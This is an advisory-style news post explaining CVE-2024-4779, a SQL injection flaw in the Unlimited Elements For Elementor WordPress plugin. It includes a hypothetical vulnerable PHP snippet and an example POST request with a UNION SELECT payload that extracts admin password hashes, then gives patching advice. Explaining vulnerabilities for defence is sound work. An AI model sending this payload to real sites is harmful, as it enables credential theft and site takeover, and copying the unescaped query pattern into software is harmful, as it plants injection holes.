CVE CyberSecurity Database News

CVE-2024-4779 - SQL Injection Vulnerability in Unlimited Elements For Elementor Plugin Exposes WordPress Sites

Poster -

A critical vulnerability, CVE-2024-4779, has been discovered in the popular WordPress plugin Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This vulnerability, present in all versions up to and including 1.5.107, allows authenticated users (with at least contributor permissions) to perform SQL Injection via the data[post_ids][] parameter.

In this long-read post, you’ll get a clear explanation of the vulnerability, see a practical exploit example, and find resources for deeper investigation.

What is Unlimited Elements For Elementor?

Unlimited Elements for Elementor is a widely-used plugin for WordPress, boasting over 200,000 active installations. It offers a wide array of widgets, templates, and addons for easy design customization with the Elementor page builder.

The Vulnerability – CVE-2024-4779

Vulnerability Type: SQL Injection
Affected Parameter: data[post_ids][] (processing user input with insufficient escaping)
Affected Plugin Versions: <= 1.5.107
Attack Scope: Authenticated users (contributor and above)

The plugin does not properly sanitize and prepare user-supplied data when forming SQL queries. Malicious users can inject arbitrary SQL commands by passing specially-crafted values to data[post_ids][], which are then interpolated into a SQL query without proper escaping or parameterization.

This can result in exfiltration of sensitive data like user credentials, personal information, or site secrets.

The Root Cause

When the plugin receives user input for certain AJAX actions, it directly embeds values from the data[post_ids][] parameter in SQL queries, such as in a SELECT statement, without using prepared statements or escaping.

Sample vulnerable code

// Hypothetical code structure for instructional purposes
$post_ids = $_POST['data']['post_ids'][];
// Vulnerable SQL query: no sanitization!
$query = "SELECT * FROM {$wpdb->posts} WHERE ID = $post_ids";
$results = $wpdb->get_results($query);

What Can Attackers Do?

If an attacker has at least contributor-level access (can submit posts but not necessarily publish them), they can interact with vulnerable plugin endpoints and manipulate the data[post_ids][] value.

Example Exploit

Assume the vulnerable AJAX endpoint is accessible via /wp-admin/admin-ajax.php. An attacker could submit the following HTTP POST request:

POST /wp-admin/admin-ajax.php?action=ue_action_name
Content-Type: application/x-www-form-urlencoded

data[post_ids][]=1 UNION ALL SELECT user_pass,1,1,1 FROM wp_users WHERE ID=1

What happens:

The SQL query constructed on the server-side would become

SELECT * FROM wp_posts WHERE ID = 1 UNION ALL SELECT user_pass,1,1,1 FROM wp_users WHERE ID=1

If successful, the query could expose the password hash of the first WordPress admin user.

Authenticated Required:
This attack only works if the attacker can authenticate as at least a contributor — not a random visitor.

Real-World Impact

- Credentials leakage: Exposes wp_users table columns, including password hashes and email addresses.
- Site takeover: Attackers can get admin password hashes, try cracking them, and escalate their privileges.

Mitigation

Are you vulnerable?
If you are running Unlimited Elements For Elementor version 1.5.107 or earlier, you are at risk.

What to do:
- Update the plugin immediately to the latest version from unlimited-elements.com or WordPress plugins directory.

Responsible Disclosure and References

This vulnerability was responsibly disclosed and tracked as CVE-2024-4779.

Refer to the following resources for additional details

- Wordfence Advisory: Unlimited Elements For Elementor – CVE-2024-4779
- WPScan Advisory: CVE-2024-4779
- CVE Details Page: CVE-2024-4779

Closing Thoughts

SQL Injection vulnerabilities in WordPress plugins are among the most dangerous, as they can quickly lead to site compromise if left unpatched. Always practice the principle of least privilege and keep all plugins up-to-date.

Timeline

Published on: 05/23/2024 10:15:09 UTC
Last modified on: 06/04/2024 17:55:51 UTC